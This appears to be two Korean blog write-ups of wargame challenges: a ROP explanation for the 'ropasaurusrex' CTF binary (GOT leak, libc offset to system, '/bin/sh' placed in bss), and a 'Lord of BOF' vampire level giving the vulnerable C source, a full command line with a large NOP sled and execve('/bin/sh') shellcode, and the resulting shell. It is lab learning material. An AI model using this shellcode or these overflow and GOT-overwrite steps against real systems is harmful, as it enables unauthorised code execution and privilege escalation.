ropasuarusrex는 32-bit ELF파일이고 NX만 걸려있다. 데이터영역에서 코드실행이 안되므로 쉘코드는 넣지 못한다.


아이다를 이용해서 메인부터 분석했다. 엄청 간단했는데 

함수가 하나 있고 리턴값으로 WIN이 출력되어 나온다. 


sub_80483F4함수 내부로 들어가니

buf가 136바이트 만큼 선언된다. 그렇지만 read함수에서 버퍼사이즈를 넘는 256바이트의 문자열길이까지 받도록 되어있다.


이부분에서 bof가 발생한다.


ida에 나와있는데 write@plt주소와 read@plt주소를 구해주고.

plt내부로 들어가면 jmp하는 부분이 있는데 [함수 호출]--->[PLT로 이동]--->[GOT 참조]

과정에 따라 노란줄부분의 주소가 각각 write@got, read@got의 주소값이다.


objdump -d ropasaurusrex 명령어를 통해 pppr의 가젯을 찾아준다. 왜 pppr인가?

=> read함수와 write함수 모두 세개의 인자를 갖기 때문이다.



objdump -h ropasaurusrex 명령어를 통해 "/bin/sh" 문자열을 넣어줄 영역을 찾는다.

bss영역을 이용하도록 한다.



ldd(List Dynamic Dependencies)는 프로그램이나 공유 라이브러리들이 요구하는 공유 라이브러리(shared libraries)를 출력하는 명령 행(Command Line)프로그램이다.

ldd명령어를 통해 ropasaurusrex가 사용하는 공유라이브러리를 알 수 있었고 aslr이 걸려있어서 주소가 매번 바뀌는 것을 볼 수 있었다. 그래서 프로그램이 실행되면 나오는 실제 read함수의 주소를 이용한다. 

라이브러리 안에 있는 read와 system함수의 offset값의 차를 이용해서 페이로드에서 leak할 실제 read함수 주소에 더하면 실제 system함수의 주소가 나온다. 


offset값의 차를 이용하는 이유?

libc내부에서 함수들의 사이 거리는 항상 일정하기 때문이다.


libc base address + system함수 offset = 실제read함수의 주소 +(system함수 offset - read함수 offset) 


read offset - system offset = 0x9ad60


시나리오


준비물:

read_plt주소 / write_plt주소 / read_got주소 / write_got주소 / pppr주소 / bss영역 주소 / read - sys offset값



1. 버퍼(136)과 sfp(4)를 덮을 더미값을 넣는다.

2. read함수를 이용해서 bss영역에 "/bin/sh"문자열을 넣는다.  표준입력 0을 이용해서 client가 보낸 "/bin/sh"를 읽어서 bss영역에 담는다.

파이썬 코드 중 r.send(sh) 부분을 서버에서 입력받음 pppr을거쳐 다음으로   

3. write함수를 이용해서 read_got에 담겨있는 read함수의 주소를 표준출력 1을 이용해서 client에 보낸다.

파이썬 코드 중 read_leak=u32(r.recv(4)) 부분에서 출력을 받아 변수에 저장한다. pppr을거쳐 다음으로 

4. read함수는 이용해서 write_got에 system 함수의 주소를 넣는다. 표준입력 0을 이용해서 client가 보낸 real_sys를 읽어서 write_got에 담는다.

파이썬 코드 중 r.sendline(p32(real_sys))부분을 서버에서 입력받음 pppr을거쳐 다음으로 

5. 마지막으로 write를 이용하지만 결국 write_got가 4번 과정에서 system주소로 overwriting되었기 때문에 system함수가 실행될 것이다.


 

최종





'CTF' 카테고리의 다른 글

[SSG] easy_linux_reversing  (0) 2018.05.02
[Codegate 2017] babypwn  (0) 2018.02.06

[troll@localhost troll]$ cat vampire.c

/*

        The Lord of the BOF : The Fellowship of the BOF

        - vampire

        - check 0xbfff

*/


#include <stdio.h>

#include <stdlib.h>


main(int argc, char *argv[])

{

        char buffer[40];


        if(argc < 2){

                printf("argv error\n");

                exit(0);

        }


        if(argv[1][47] != '\xbf')    //0xbf로 시작하는 주소를 이용할것!

        {

                printf("stack is still your friend.\n");

                exit(0);

        }


        // here is changed!

        if(argv[1][46] == '\xff')     //0xbfff로 시작하는 주소는 이용하지 말것!

        {

                printf("but it's not forever\n");

                exit(0);

        }


        strcpy(buffer, argv[1]);

        printf("%s\n", buffer);

}




0xbfffffff<-이 주소값이 커널영역아래로 가장 높은 주소이다. 4번째 헥스값인 f를 e로 수정한다면 빨간줄을 쳐놓은 두번째 조건을 피해 갈 수 있을것이다. 

0xbffeffff <-이 주소가 0xbffe~~주소중에선 가장 높은 값이고 16^4 = 65536정도 더 넉넉하게 66000개의 nop를 넣어주면 ret주소를 0xbffe로 시작하게 쓸 수 있다.

 



[troll@localhost troll]$./vampire `python -c 'print "\x90"*44+"\x50\xfd\xfe\xbf"+"\x90"*66000+"\x31\xc0\xb0\x31\xcd\x80\x89\xc3\x89\xc1\x31\xc0\xb0\x46\xcd\x80\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x89\xc2\xb0\x0b\xcd\x80"'`

▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒1▒1̀▒É▒1▒F̀1▒Ph//shh/bin▒▒PS▒▒°

                                                                             ̀

bash$ whoami

vampire

bash$ my-pass

euid = 509

music world



'System Hacking > Lord of Buffer overflow' 카테고리의 다른 글

11.lob skeleton->golem  (0) 2018.01.08
10.lob vampire->skeleton  (0) 2018.01.08
08.lob orge->troll  (0) 2018.01.08
07.lob darkelf->orge  (0) 2018.01.08
06.lob wolfman->darkelf  (0) 2018.01.08

+ Recent posts

티스토리툴바